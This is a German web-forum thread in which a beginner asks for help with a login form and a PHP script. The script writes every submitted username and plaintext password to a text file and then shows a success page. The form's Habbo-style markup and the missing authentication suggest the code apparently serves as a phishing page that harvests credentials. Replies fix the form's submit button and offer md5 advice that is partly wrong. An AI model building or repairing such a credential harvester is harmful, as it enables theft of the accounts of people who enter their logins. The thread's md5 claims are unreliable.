Problem mit Login-Feld

[VollDerNewb]

Hallo Community,

ich habe ein Problem: Ich arbeite an einem LogIn-Feld für eine Seite. Dieses soll die Möglichkeit für den User beinhalten, die Usernamen in einem .txt file abzuspeichern, damit der User halt nicht immer wieder eingeben muss.

Jetzt speichert das Script die Passwörter und Usernamen korrekt in dem txt-File, nur bei Drücken des Buttons (der auf die gleiche LogIn.php {die die Daten an das txt-file schickt} hinführt) werden die Daten nicht gespeichert.

Also Login.php ist in index.htm eingebunden und schreibt bei Einloggen per Enter ohne Probleme den Eintrag ins txt-dok. Per Login-Button aber nicht :S

Kann mir da wer helfen? Hoffe ich hab mich einigermaßen klar ausgedrückt^^

 

[Imbericle]

Dir sollte klar sein, falls es dir das nicht ist, dass du die Text datei auf deinem Server aber auch schützen musst, sonst kann jeder alles auslesen^^

Wenn du den Code schickst ist das Helfen sicher einfacher.


MfG

 

[VollDerNewb]

Sourcecode

login-feld

<form action="login.php" method="post" class="login-habblet">
            
            <ul>
                <li>
                    <label for="login-username" class="login-text">Username</label>
                    <input tabindex="1" class="login-field" name="benutzer" id="login-username" value="" maxlength="32" type="text">
                </li>
                <li>
                    <label for="login-password" class="login-text">Passwort</label>
                    <input tabindex="2" class="login-field" name="pass" id="login-password" maxlength="32" type="password">
                    <input style="margin-left: -10000px;" value="Login" class="submit" id="login-submit-button" type="submit">
                    <a href="login.php" id="login-submit-new-button" class="new-button" style="margin-left: 0pt;"><b style="padding-left: 10px; padding-right: 7px; width: 55px;">Login</b><i></i></a>
                </li>
            </ul>
        </form>

LogIn.php

<html>
<head>
 <meta http-equiv="refresh" content="1; url=/succes.html">    //Weiterleitung zu einer Unterseite die den LogIn bestätigt!
</head>
<body>
<?php
$username = $_POST["benutzer"];
$pw = $_POST["pass"];

$d = fopen("log.txt","a");
fwrite ($d,"user: $username
pass: $pw

");
fclose($d);      
?>
</body>
</html>

 

[vitus37]

Mit diesem Code sind die Benutzerdaten jedes users von jedem auszulesen.
man braucht im Browser nur die log.txt Datei zu öffnen. Wie Imbericle schon sagte.

Das mindeste, das du dagegen tun kannst ist das Passwort mittels md5-hash zu verschlüseln.

Fehler in deinen Scripten konnte ich persönlich nicht finden...

 

[VollDerNewb]

Wahh!^^

Danke für den Tipp!
Wie mach ich das Verschlüsseln? Mit Programmen? Wenn ja welche sind gut?

 

[neuroleptika]

<a href="login.php" id="login-submit-new-button" class="new-button" >...<b>Login</b>...</a>

Das ist nur ein Link zu login.php. Das Formular wird so nicht abgesendet.
Wenn du keinen submit-Button verwenden möchtest brauchst du Javascript (submit()).

 

[vitus37]

Eine zeile drüber sehe ich einen Submit Button^^

 

[vitus37]

md5-Hash gibt es in PHP als Funtkion (md5()).
Wenn du nun das Passwort verschlüsseln möchtest und dann in die Textdatei schreiben möchtest, nimm das Passwort vom Formular so an:

$pw = md5($_POST['pass']);

Das Passwort wird dann in einenn (ich glaube) 26-stelligen String umgewandelt, welcher (fast) nicht zurückgewandelt werden kann.

Achte dann aber darauf, dass wenn du versuchst per Login auf die Daten zuzugreifen das Passwort ebenfalls mit md5() zu verschlüsseln, bevor du beide miteinander vergleichst.

 

[neuroleptika]

Eine zeile drüber sehe ich einen Submit Button^^

Den wird aber kaum wer finden:

margin-left: -10000px

 

[vitus37]

Oh, das habe ich übersehen. :-?

 

[VollDerNewb]

Gelöst!

Dankeschön für die Hilfe ;) Jetzt klappt's !

Offtopic: Wieso seh ich die Seite nicht in Google?
Habe sie eigentlich eingetragen..

Und: Hat das Google-Ranking was mit Hits oder wirklich nur mit verlinkten Seiten zu tun?

 

[neuroleptika]

...
Offtopic: Wieso seh ich die Seite nicht in Google?

Kann ich dir so nicht sagen.

Vielleicht sollte sie auch besser noch nicht zu finden sein.
Mit dem was du hier gezeigt hast kann Jeder in deine .txt eintragen was er will.

Damit kennen sich andere aber besser aus.

Edit:
Probleme mit Login-Feld! - XHTMLforum
Die Kennen sich auch aus.

 

[xXxPeterPanxXx]

Offtopic: Wieso seh ich die Seite nicht in Google?
Habe sie eigentlich eingetragen..

Wann hast du Sie denn eingetragen? Es kann bis zu 3 Monate dauern, aber wenn du einen oder mehre gute Backlinks z.B von html.de hast.:roll: Geht das ganze viel schneller? Meine war nach 1 1/2 Wochen drin.

MfG xXxPeterPanxXx